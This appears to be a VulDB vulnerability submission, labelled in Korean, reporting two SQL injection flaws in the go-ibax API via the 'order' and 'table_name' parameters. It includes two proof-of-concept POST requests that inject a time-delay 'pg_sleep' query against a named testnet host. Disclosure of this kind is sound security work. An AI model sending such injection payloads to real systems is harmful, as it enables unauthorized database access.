| 제목 | SQL Injection vulnerabilities in go-ibax via order,table_name parameter |
|---|
| 설명 | There are two SQL injection vulnerabilities.
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--
Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01 |
|---|
| 원천 | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2060 |
|---|
| 사용자 | Tomy (UID 34751) |
|---|
| 제출 | 2022. 11. 01. PM 12:36 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 11. 01. PM 04:38 (4 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 212634 [IBAX go-ibax /api/v2/open/tablesInfo SQL 주입] |
|---|
| 포인트들 | 20 |
|---|